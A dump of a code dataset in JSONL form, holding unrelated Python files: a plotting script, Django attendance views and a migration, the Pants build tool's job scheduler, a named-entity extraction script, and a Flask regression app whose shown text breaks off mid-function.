{"api_name": "pygame.mouse.get_pos", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 20, "usage_type": "attribute"}, {"api_name": "Board.tile.Tile", "line_number": 47, "usage_type": "call"}, {"api_name": "Pieces.NullPiece.NullPiece", "line_number": 47, "usage_type": "call"}, {"api_name": "Board.tile.Tile", "line_number": 49, "usage_type": "call"}, {"api_name": "Pieces.NullPiece.NullPiece", "line_number": 49, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 53, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 56, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 56, "usage_type": "attribute"}, {"api_name": "Board.tile.Tile", "line_number": 75, "usage_type": "call"}, {"api_name": "Pieces.NullPiece.NullPiece", "line_number": 75, "usage_type": "call"}, {"api_name": "Board.tile.Tile", "line_number": 76, "usage_type": "call"}, {"api_name": "Pieces.NullPiece.NullPiece", "line_number": 76, "usage_type": "call"}, {"api_name": "Board.tile.Tile", "line_number": 81, "usage_type": "call"}, {"api_name": "Pieces.NullPiece.NullPiece", "line_number": 81, "usage_type": "call"}, {"api_name": "Board.tile.Tile", "line_number": 82, "usage_type": "call"}, {"api_name": "Pieces.NullPiece.NullPiece", "line_number": 82, "usage_type": "call"}, {"api_name": "Board.tile.Tile", "line_number": 86, "usage_type": "call"}, {"api_name": "Pieces.NullPiece.NullPiece", "line_number": 86, "usage_type": "call"}, {"api_name": "Board.tile.Tile", "line_number": 87, "usage_type": "call"}, {"api_name": "Pieces.NullPiece.NullPiece", "line_number": 87, "usage_type": "call"}, {"api_name": "bot.evaluate", "line_number": 102, "usage_type": "call"}, {"api_name": "Board.board.Board", "line_number": 147, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 152, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 162, "usage_type": "call"}, {"api_name": "Board.board.Board", "line_number": 174, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 186, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 209, "usage_type": "call"}, {"api_name": "Board.board.Board", "line_number": 224, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 250, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 250, "usage_type": "attribute"}, {"api_name": "image.Image", "line_number": 292, "usage_type": "call"}]} +{"seq_id": "134917451", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 29 20:10:31 2019\n\n@author: evan9\n\"\"\"\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndata = pd.read_csv('THfinish_edited.csv')\nx = data.iloc[:, 0]\ny = data.iloc[:, 1]\n\nfig = plt.figure(figsize=(10,6))\naxes = fig.add_axes([0.1, 0.1, 0.8, 0.8])\naxes.plot(x, y, color='blue', lw=0, marker='o', markersize=8)\naxes.set_ylim([0, 3])\naxes.axvline(x=0.580, color='black', ls='--')\naxes.axvline(x=0.924, color='black', ls='--')\naxes.axhline(y=2.070, color='red', ls='--')\n\naxes.set_xlabel('Stimulus intensity (mV)', fontsize=16)\naxes.set_ylabel('Response (mV)', fontsize=16)\naxes.set_title('Threshold & MSI', fontsize=24)\n\nplt.show()\n#fig.savefig('Threshold MSI2.png', dpi=200)\n\n\n", "sub_path": "2a AnimalLab/1.CAP/Threshold MSI Plot.py", "file_name": "Threshold MSI Plot.py", "file_ext": "py", "file_size_in_byte": 724, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": 
"pandas.read_csv", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}]} +{"seq_id": "102304568", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom datetime import date, datetime\n\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse_lazy\nfrom django.views.generic import View, CreateView, UpdateView, DeleteView, ListView, DetailView\nfrom clubManagement.models import Attendance, Responsibility\nfrom registration.models import UserInfo\n\nmonth = [\"January\", \"February\", \"March\", \"April\", \"May\", \"June\", \"July\", \"August\", \"September\",\n \"October\", \"November\", \"December\"]\n\nmonth_num = range(12)\n\n\ndef calculate_year(year):\n year = datetime.now().year - year\n if datetime.now().month > 5:\n year += 1\n print(year)\n if year == 1:\n return '1st year'\n elif year == 2:\n return '2nd year'\n elif year == 3:\n return '3rd year'\n elif year == 4:\n return '4th year'\n else:\n return 'Alumni - ' + str(year + datetime.now().year) + ' batch'\n\n\ndef get_batch_list(kwargs):\n batches = []\n if 'batch' in kwargs:\n batches += [int(kwargs.get('batch'))]\n else:\n year = datetime.now().year\n if datetime.now().month < 5:\n year -= 1\n for i in range(4):\n batches += [year - i]\n print(batches)\n return batches\n\n\nclass AttendanceAddView(View):\n template_name = 'clubManagement/attendance_add.html'\n\n def get(self, request, **kwargs):\n \"\"\"\n A view for an admin to add attendance for a particular date.\n url = /batch/year/month/day/\n or\n url = /year/month/day (display 1st - 4th year)\n date is calculated from (year, month, day)\n and students is selected according to batch\n\n attendance_list = [ [ '1st_year', list_of_1st_years ], ..... 
]\n        \"\"\"\n        if not request.user.is_authenticated:\n            return redirect('permission_denied')\n\n        d = date(int(kwargs.get('year')), int(kwargs.get('month')), int(kwargs.get('day')))\n        context = {}\n        batch_list = get_batch_list(kwargs)\n\n        attendance_list = []\n\n        for batch in batch_list:\n            user_info_list = UserInfo.objects.filter(year=batch)\n            # display the current attendance for this date and batch\n            attendance_list_batch = []\n            for user_info in user_info_list:\n                try:\n                    attendance = Attendance.objects.get(user=user_info.user, date=d)\n                except Attendance.DoesNotExist:\n                    attendance = Attendance(user=user_info.user,\n                                            added_by=User.objects.get(username=self.request.user.username), date=d)\n                    attendance.save()\n                attendance_list_batch.append(attendance)\n\n            # attendance list contains all the Attendance objects of the batch with date = d\n            year = calculate_year(batch)\n            attendance_list += [[attendance_list_batch, year], ]\n\n        context = {'attendance_list': attendance_list}\n        print(context)\n        return render(request, self.template_name, context)\n\n    def post(self, request, **kwargs):\n        if not request.user.is_superuser:\n            return redirect('permission_denied')\n\n        d = date(int(kwargs.get('year')), int(kwargs.get('month')), int(kwargs.get('day')))\n\n        if 'batch' in kwargs:\n            user_info_list = UserInfo.objects.filter(year=int(kwargs.get('batch')))\n            for user_info in user_info_list:\n                attendance_list = user_info.user.attendance_set.filter(date=d)\n                for i in attendance_list:\n                    i.attendance = False\n                    i.save()\n        else:\n            # make all attendance false and make attendance = true for users in request.POST.\n            attendance_list = Attendance.objects.filter(date=d)\n            for i in attendance_list:\n                i.attendance = False\n                i.save()\n\n        for key in request.POST:\n            try:\n                user = User.objects.get(username=key)\n            except User.DoesNotExist:\n                user = None\n            if user:\n                att = Attendance.objects.get(user=user, date=d)\n                att.attendance = True\n                att.save()\n        if 'batch' in kwargs:\n            return redirect('add_attendance_batch', **kwargs)\n        else:\n            return redirect('add_attendance_all', **kwargs)\n\n\nclass YearStudentAttendanceReportView(View):\n    template_name = 'clubManagement/attendance_yearly.html'\n\n    def get(self, request, **kwargs):\n        user = User.objects.get(id=int(kwargs.get('user_id')))\n        att = user.attendance_set.filter(date__year=int(kwargs.get('year')))\n        if len(att) > 0:\n            month_att = []\n            for i in month_num:\n                month_att.append(len(att.filter(date__month=(i + 1))))\n            context = {'user': user, 'month_att': month_att, 'month': month, 'month_num': month_num,\n                       'year': kwargs.get('year')}\n        else:\n            context = {'errors': 'No records found'}\n        return render(request, self.template_name, context)\n\n\nclass YearAttendanceReportView(View):\n    \"\"\"\n    context = {'data_list': data_list}\n    where:\n    data_list = [ [user_data, year, error], ....]\n    user_data = [[user, month_att, total_att], ......]\n    month_att = list of attendance for 12 months\n    \"\"\"\n    template_name = 'clubManagement/attendance_batch_yearly.html'\n\n    def get(self, request, **kwargs):\n        batch_list = get_batch_list(kwargs)\n        data_list = []\n        for batch in batch_list:\n            user_info_list = UserInfo.objects.filter(year=batch)\n            user_data = []\n            for user_info in user_info_list:\n                month_att = []\n                total_att = 0\n                for i in month_num:\n                    att_month = len(\n                        user_info.user.attendance_set.filter(\n                            date__year=int(kwargs.get('year')),\n                            date__month=(i + 1),\n                            attendance=True\n                        )\n                    )\n                    total_att += att_month\n                    month_att.append(att_month)\n                user_data.append([user_info.user, month_att, total_att])\n            year = calculate_year(batch)\n            if len(user_data) > 0:\n                data_list.append([user_data, year, ''])\n            else:\n                data_list.append([user_data, year, 'No record found'])\n        context = {'data_list': data_list}\n        return render(request, self.template_name, context)\n\n\n# Responsibilities\n# CreateView and UpdateView call get_absolute_url() on the model to get the success_url\nclass ResponsibilityListView(ListView):\n    model = Responsibility\n\n\nclass ResponsibilityDetailView(DetailView):\n    model = Responsibility\n\n\nclass ResponsibilityCreateView(CreateView):\n    model = Responsibility\n    fields = ['created_by', 'name', 'description']\n\n    def form_valid(self, form):\n        form.instance.created_by = self.request.user\n        return super(ResponsibilityCreateView, self).form_valid(form)\n\n\nclass ResponsibilityUpdateView(UpdateView):\n    model = Responsibility\n    fields = ['name', 'description']\n\n\nclass ResponsibilityDeleteView(DeleteView):\n    model = Responsibility\n    success_url = reverse_lazy('responsibility')\n", "sub_path": "clubManagement/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 7433, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "datetime.datetime.now", "line_number": 20, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 20, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 21, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 21, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 33, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 41, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 41, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 42, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 42, "usage_type": "name"}, {"api_name": "django.views.generic.View", "line_number": 50, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 65, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 67, "usage_type": "call"}, {"api_name": "registration.models.UserInfo.objects.filter", "line_number": 74, "usage_type": "call"}, {"api_name": "registration.models.UserInfo.objects", "line_number": 74, "usage_type": "attribute"}, {"api_name": "registration.models.UserInfo", "line_number": 74, "usage_type": "name"}, {"api_name": "clubManagement.models.Attendance.objects.get", "line_number": 79, "usage_type": "call"}, {"api_name": "clubManagement.models.Attendance.objects", "line_number": 79, "usage_type": "attribute"}, {"api_name": "clubManagement.models.Attendance", "line_number": 79, "usage_type": "name"}, {"api_name": "clubManagement.models.Attendance.DoesNotExist", "line_number": 80, "usage_type": "attribute"}, {"api_name": "clubManagement.models.Attendance", "line_number": 80, "usage_type": "name"}, {"api_name": "clubManagement.models.Attendance", "line_number": 81, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 82, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 82, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 82, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 92, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 96, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 98, "usage_type": "call"}, {"api_name": "registration.models.UserInfo.objects.filter", "line_number": 101, "usage_type": "call"}, {"api_name": "registration.models.UserInfo.objects", "line_number": 101, "usage_type": "attribute"}, {"api_name": "registration.models.UserInfo", "line_number": 101, "usage_type": "name"}, {"api_name": "clubManagement.models.Attendance.objects.filter", "line_number": 109, "usage_type": "call"}, {"api_name": "clubManagement.models.Attendance.objects", "line_number": 109, "usage_type": "attribute"}, {"api_name": "clubManagement.models.Attendance", "line_number": 109, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 116, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 116, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 116, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.DoesNotExist", "line_number": 117, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 117, "usage_type": "name"}, {"api_name": "clubManagement.models.Attendance.objects.get", "line_number": 120, "usage_type": "call"}, {"api_name": "clubManagement.models.Attendance.objects", "line_number": 120, "usage_type": "attribute"}, {"api_name": "clubManagement.models.Attendance", "line_number": 120, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 124, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 126, "usage_type": "call"}, {"api_name": "django.views.generic.View", "line_number": 129, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 133, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 133, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 133, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 143, "usage_type": "call"}, {"api_name": "django.views.generic.View", "line_number": 146, "usage_type": "name"}, {"api_name": "registration.models.UserInfo.objects.filter", "line_number": 160, "usage_type": "call"}, {"api_name": "registration.models.UserInfo.objects", "line_number": 160, "usage_type": "attribute"}, {"api_name": "registration.models.UserInfo", "line_number": 160, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 182, "usage_type": "call"}, {"api_name": "django.views.generic.ListView", "line_number": 187, "usage_type": "name"}, {"api_name": "clubManagement.models.Responsibility", "line_number": 188, "usage_type": "name"}, {"api_name": "django.views.generic.DetailView", "line_number": 191, "usage_type": "name"}, {"api_name": "clubManagement.models.Responsibility", "line_number": 192, "usage_type": "name"}, {"api_name": "django.views.generic.CreateView", "line_number": 195, "usage_type": "name"}, {"api_name": "clubManagement.models.Responsibility", "line_number": 196, "usage_type": "name"}, {"api_name": "django.views.generic.UpdateView", "line_number": 204, "usage_type": "name"}, {"api_name": "clubManagement.models.Responsibility", "line_number": 205, "usage_type": "name"}, {"api_name": "django.views.generic.DeleteView", "line_number": 209, "usage_type": "name"}, {"api_name": "clubManagement.models.Responsibility", "line_number": 210, "usage_type": "name"}, {"api_name": "django.urls.reverse_lazy", "line_number": 211, "usage_type": "call"}]}
+{"seq_id": "247217343", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('minions', '0001_initial'),\n    ]\n\n    operations = [\n        migrations.AddField(\n            model_name='paperwork',\n            name='emp_docs',\n            field=models.CharField(blank=True, max_length=3, null=True, verbose_name=b'IDs Received?', choices=[(b'yes', b'yes'), (b'no', b'no')]),\n            preserve_default=True,\n        ),\n    ]\n", "sub_path": "minions/migrations/0002_paperwork_emp_docs.py", "file_name": "0002_paperwork_emp_docs.py", "file_ext": "py", "file_size_in_byte": 526, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}]}
+{"seq_id": "171076035", "text": "# coding=utf-8\n# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).\n# Licensed under the Apache License, Version 2.0 (see LICENSE).\n\nfrom __future__ import (absolute_import, division, generators, nested_scopes, print_function,\n                        unicode_literals, with_statement)\n\nimport Queue as queue\nimport threading\nimport traceback\nfrom collections import defaultdict, deque\nfrom heapq import heappop, heappush\n\nfrom pants.base.worker_pool import Work\n\n\nclass Job(object):\n  \"\"\"A unit of scheduling for the ExecutionGraph.\n\n  The ExecutionGraph represents a DAG of dependent work. A Job is a node in the graph along with the\n  keys of its dependent jobs.\n  \"\"\"\n\n  def __init__(self, key, fn, dependencies, size=0, on_success=None, on_failure=None):\n    \"\"\"\n\n    :param key: Key used to reference and look up jobs\n    :param fn callable: The work to perform\n    :param dependencies: List of keys for dependent jobs\n    :param size: Estimated job size used for prioritization\n    :param on_success: Zero parameter callback to run if job completes successfully. Run on main\n      thread.\n    :param on_failure: Zero parameter callback to run if the job fails. 
Run on main\n thread.\"\"\"\n self.key = key\n self.fn = fn\n self.dependencies = dependencies\n self.size = size\n self.on_success = on_success\n self.on_failure = on_failure\n\n def __call__(self):\n self.fn()\n\n def run_success_callback(self):\n if self.on_success:\n self.on_success()\n\n def run_failure_callback(self):\n if self.on_failure:\n self.on_failure()\n\n\nUNSTARTED = 'Unstarted'\nQUEUED = 'Queued'\nSUCCESSFUL = 'Successful'\nFAILED = 'Failed'\nCANCELED = 'Canceled'\n\n\nclass StatusTable(object):\n DONE_STATES = {SUCCESSFUL, FAILED, CANCELED}\n\n def __init__(self, keys, pending_dependencies_count):\n self._statuses = {key: UNSTARTED for key in keys}\n self._pending_dependencies_count = pending_dependencies_count\n\n def mark_as(self, state, key):\n self._statuses[key] = state\n\n def mark_queued(self, key):\n self.mark_as(QUEUED, key)\n\n def unfinished_items(self):\n \"\"\"Returns a list of (name, status) tuples, only including entries marked as unfinished.\"\"\"\n return [(key, stat) for key, stat in self._statuses.items() if stat not in self.DONE_STATES]\n\n def failed_keys(self):\n return [key for key, stat in self._statuses.items() if stat == FAILED]\n\n def is_unstarted(self, key):\n return self._statuses.get(key) is UNSTARTED\n\n def mark_one_successful_dependency(self, key):\n self._pending_dependencies_count[key] -= 1\n\n def is_ready_to_submit(self, key):\n return self.is_unstarted(key) and self._pending_dependencies_count[key] == 0\n\n def are_all_done(self):\n return all(s in self.DONE_STATES for s in self._statuses.values())\n\n def has_failures(self):\n return any(stat is FAILED for stat in self._statuses.values())\n\n\nclass ExecutionFailure(Exception):\n \"\"\"Raised when work units fail during execution\"\"\"\n\n def __init__(self, message, cause=None):\n if cause:\n message = \"{}: {}\".format(message, str(cause))\n super(ExecutionFailure, self).__init__(message)\n self.cause = cause\n\n\nclass UnexecutableGraphError(Exception):\n \"\"\"Base exception class for errors that make an ExecutionGraph not executable\"\"\"\n\n def __init__(self, msg):\n super(UnexecutableGraphError, self).__init__(\"Unexecutable graph: {}\".format(msg))\n\n\nclass NoRootJobError(UnexecutableGraphError):\n def __init__(self):\n super(NoRootJobError, self).__init__(\n \"All scheduled jobs have dependencies. 
There must be a circular dependency.\")\n\n\nclass UnknownJobError(UnexecutableGraphError):\n def __init__(self, undefined_dependencies):\n super(UnknownJobError, self).__init__(\"Undefined dependencies {}\"\n .format(\", \".join(map(repr, undefined_dependencies))))\n\n\nclass JobExistsError(UnexecutableGraphError):\n def __init__(self, key):\n super(JobExistsError, self).__init__(\"Job already scheduled {!r}\"\n .format(key))\n\n\nclass ThreadSafeCounter(object):\n def __init__(self):\n self.lock = threading.Lock()\n self._counter = 0\n\n def get(self):\n with self.lock:\n return self._counter\n\n def increment(self):\n with self.lock:\n self._counter += 1\n\n def decrement(self):\n with self.lock:\n self._counter -= 1\n\n\nclass ExecutionGraph(object):\n \"\"\"A directed acyclic graph of work to execute.\n\n This is currently only used within jvm compile, but the intent is to unify it with the future\n global execution graph.\n \"\"\"\n\n def __init__(self, job_list):\n \"\"\"\n\n :param job_list Job: list of Jobs to schedule and run.\n \"\"\"\n self._dependencies = defaultdict(list)\n self._dependees = defaultdict(list)\n self._jobs = {}\n self._job_keys_as_scheduled = []\n self._job_keys_with_no_dependencies = []\n\n for job in job_list:\n self._schedule(job)\n\n unscheduled_dependencies = set(self._dependees.keys()) - set(self._job_keys_as_scheduled)\n if unscheduled_dependencies:\n raise UnknownJobError(unscheduled_dependencies)\n\n if len(self._job_keys_with_no_dependencies) == 0:\n raise NoRootJobError()\n\n self._job_priority = self._compute_job_priorities(job_list)\n\n def format_dependee_graph(self):\n return \"\\n\".join([\n \"{} -> {{\\n {}\\n}}\".format(key, ',\\n '.join(self._dependees[key]))\n for key in self._job_keys_as_scheduled\n ])\n\n def _schedule(self, job):\n key = job.key\n dependency_keys = job.dependencies\n self._job_keys_as_scheduled.append(key)\n if key in self._jobs:\n raise JobExistsError(key)\n self._jobs[key] = job\n\n if len(dependency_keys) == 0:\n self._job_keys_with_no_dependencies.append(key)\n\n self._dependencies[key] = dependency_keys\n for dependency_key in dependency_keys:\n self._dependees[dependency_key].append(key)\n\n def _compute_job_priorities(self, job_list):\n \"\"\"Walks the dependency graph breadth-first, starting from the most dependent tasks,\n and computes the job priority as the sum of the jobs sizes along the critical path.\"\"\"\n\n job_size = {job.key: job.size for job in job_list}\n job_priority = defaultdict(int)\n\n bfs_queue = deque()\n for job in job_list:\n if len(self._dependees[job.key]) == 0:\n job_priority[job.key] = job_size[job.key]\n bfs_queue.append(job.key)\n\n satisfied_dependees_count = defaultdict(int)\n while len(bfs_queue) > 0:\n job_key = bfs_queue.popleft()\n for dependency_key in self._dependencies[job_key]:\n job_priority[dependency_key] = \\\n max(job_priority[dependency_key],\n job_size[dependency_key] + job_priority[job_key])\n satisfied_dependees_count[dependency_key] += 1\n if satisfied_dependees_count[dependency_key] == len(self._dependees[dependency_key]):\n bfs_queue.append(dependency_key)\n\n return job_priority\n\n def execute(self, pool, log):\n \"\"\"Runs scheduled work, ensuring all dependencies for each element are done before execution.\n\n :param pool: A WorkerPool to run jobs on\n :param log: logger for logging debug information and progress\n\n submits all the work without any dependencies to the worker pool\n when a unit of work finishes,\n if it is successful\n calls success callback\n 
checks for dependees whose dependencies are all successful, and submits them\n      if it fails\n        calls failure callback\n        marks dependees as failed and queues them directly into the finished work queue\n    when all work is either successful or failed,\n      cleans up the work pool\n    if there's an exception on the main thread,\n      calls failure callback for unfinished work\n      aborts work pool\n      re-raises\n    \"\"\"\n    log.debug(self.format_dependee_graph())\n\n    status_table = StatusTable(self._job_keys_as_scheduled,\n                               {key: len(self._jobs[key].dependencies) for key in self._job_keys_as_scheduled})\n    finished_queue = queue.Queue()\n\n    heap = []\n    jobs_in_flight = ThreadSafeCounter()\n\n    def put_jobs_into_heap(job_keys):\n      for job_key in job_keys:\n        # minus because jobs with larger priority should go first\n        heappush(heap, (-self._job_priority[job_key], job_key))\n\n    def try_to_submit_jobs_from_heap():\n      def worker(worker_key, work):\n        try:\n          work()\n          result = (worker_key, SUCCESSFUL, None)\n        except Exception as e:\n          result = (worker_key, FAILED, e)\n        finished_queue.put(result)\n        jobs_in_flight.decrement()\n\n      while len(heap) > 0 and jobs_in_flight.get() < pool.num_workers:\n        priority, job_key = heappop(heap)\n        jobs_in_flight.increment()\n        status_table.mark_queued(job_key)\n        pool.submit_async_work(Work(worker, [(job_key, (self._jobs[job_key]))]))\n\n    def submit_jobs(job_keys):\n      put_jobs_into_heap(job_keys)\n      try_to_submit_jobs_from_heap()\n\n    try:\n      submit_jobs(self._job_keys_with_no_dependencies)\n\n      while not status_table.are_all_done():\n        try:\n          finished_key, result_status, value = finished_queue.get(timeout=10)\n        except queue.Empty:\n          log.debug(\"Waiting on \\n  {}\\n\".format(\"\\n  \".join(\n            \"{}: {}\".format(key, state) for key, state in status_table.unfinished_items())))\n          try_to_submit_jobs_from_heap()\n          continue\n\n        finished_job = self._jobs[finished_key]\n        direct_dependees = self._dependees[finished_key]\n        status_table.mark_as(result_status, finished_key)\n\n        # Queue downstream tasks.\n        if result_status is SUCCESSFUL:\n          try:\n            finished_job.run_success_callback()\n          except Exception as e:\n            log.debug(traceback.format_exc())\n            raise ExecutionFailure(\"Error in on_success for {}\".format(finished_key), e)\n\n          ready_dependees = []\n          for dependee in direct_dependees:\n            status_table.mark_one_successful_dependency(dependee)\n            if status_table.is_ready_to_submit(dependee):\n              ready_dependees.append(dependee)\n\n          submit_jobs(ready_dependees)\n        else:  # Failed or canceled.\n          try:\n            finished_job.run_failure_callback()\n          except Exception as e:\n            log.debug(traceback.format_exc())\n            raise ExecutionFailure(\"Error in on_failure for {}\".format(finished_key), e)\n\n          # Propagate failures downstream.\n          for dependee in direct_dependees:\n            if status_table.is_unstarted(dependee):\n              status_table.mark_queued(dependee)\n              finished_queue.put((dependee, CANCELED, None))\n\n        # Log success or failure for this job.\n        if result_status is FAILED:\n          log.error(\"{} failed: {}\".format(finished_key, value))\n        else:\n          log.debug(\"{} finished with status {}\".format(finished_key, result_status))\n    except ExecutionFailure:\n      raise\n    except Exception as e:\n      # Call failure callbacks for jobs that are unfinished.\n      for key, state in status_table.unfinished_items():\n        self._jobs[key].run_failure_callback()\n      log.debug(traceback.format_exc())\n      raise ExecutionFailure(\"Error running job\", e)\n\n    if status_table.has_failures():\n      raise ExecutionFailure(\"Failed jobs: {}\".format(', '.join(status_table.failed_keys())))\n", "sub_path": "src/python/pants/backend/jvm/tasks/jvm_compile/execution_graph.py", "file_name": "execution_graph.py", "file_ext": "py", "file_size_in_byte": 11428, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "threading.Lock", "line_number": 134, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 162, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 163, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 206, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 208, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 214, "usage_type": "call"}, {"api_name": "Queue.Queue", "line_number": 252, "usage_type": "call"}, {"api_name": "heapq.heappush", "line_number": 260, "usage_type": "call"}, {"api_name": "heapq.heappop", "line_number": 273, "usage_type": "call"}, {"api_name": "pants.base.worker_pool.Work", "line_number": 276, "usage_type": "call"}, {"api_name": "Queue.Empty", "line_number": 288, "usage_type": "attribute"}, {"api_name": "traceback.format_exc", "line_number": 303, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 317, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 337, "usage_type": "call"}]}
+{"seq_id": "226724734", "text": "#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n'''\nextracts named entities from the interviews, iterating over the files in the directory (so you can watch the progress)\nRequires the Interviews directory and the interview files produced by the extractInterview.py script\n\nusage : python3 extractNE-2.py [language=fr]\noutput : Out-EN-polyglott.txt\n\nif you run into problems:\npip3 install pycld2\npip3 install morfessor\npip3 install pyicu\npip3 install pycld2\n\nthen :\npolyglot download embeddings2.en\npolyglot download ner2.en\npolyglot download embeddings2.fr\npolyglot download ner2.fr\n\n'''\n\nimport os\nimport re\nimport sys\nfrom datetime import datetime\nfrom termcolor import colored\nfrom polyglot.text import Text as Ptext\nfrom tqdm import tqdm\n\ntry:\n    lang = sys.argv[1]\nexcept IndexError:\n    print('defaulting to French')\n    lang = 'fr'\n\nrep = './Interviews/'\nlisInterview = os.listdir(rep)\npbar = tqdm(total=len(lisInterview))\n\nout = open(\"Out-EN-polyglott.txt\", 'w')\nnamedEntities = []\n\nfor file in lisInterview:\n\n    ptext = Ptext(open(rep + file).read(), hint_language_code=lang)\n    ne = ptext.entities\n    namedEntities = namedEntities + ne\n    for e in ne: out.write(str(e) + '\\n')\n    pbar.update()\n\nout.close()\n\nprint(colored(namedEntities[:-100],'green'))\nprint(str(len(namedEntities)) + ' named entities found')\nprint(\"output file: Out-EN-polyglott.txt\")\n", "sub_path": "extractNE-polyglott-.py", "file_name": "extractNE-polyglott-.py", "file_ext": "py", "file_size_in_byte": 1316, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.argv", "line_number": 33, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 39, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 40, "usage_type": "call"}, {"api_name": "polyglot.text.Text", "line_number": 47, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 55, "usage_type": "call"}]}
+{"seq_id": "139914465", "text": "# Example adapted from http://flask.pocoo.org/docs/0.12/patterns/fileuploads/\n# @NOTE: The code below is for educational purposes only.\n# Consider using the more secure 
version at the link above for production apps\nimport matplotlib.pyplot as plt\nfrom sklearn import tree\nfrom sklearn.linear_model import LinearRegression\nimport pandas as pd\nimport numpy as np\nimport pickle\nimport os\nfrom keras.models import load_model\nfrom flask import Flask, request, render_template,json\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = 'uploads'\n\n\ndef train_model():\n arr = []\n df = pd.read_csv(\"stats1.csv\")\n target_names = df[\"TD\"]\n data = df.drop(\"TD\", axis=1)\n feature_names = data.columns\n\n data = df.values\n X = data[:, 0:11]\n y = data[:, 11]\n y = y.astype('int')\n X = X.astype('int')\n\n model = LinearRegression()\n model.fit(X, y)\n score = model.score(X, y)\n # print(f\"R2 Score: {score}\")\n arr.append(X)\n arr.append(y)\n return arr\n\n\n@app.route('/data')\ndef landing_page():\n\n df = pd.read_csv(\"stats2.csv\")\n\n\n # a=[]\n # a.append(df.to_json(orient='records', lines=True))\n # a\n response = app.response_class(\n # response=json.dumps(df.to_json(orient='index')),\n response=df.to_json(orient='index'),\n\n status=200,\n mimetype='application/json'\n )\n return 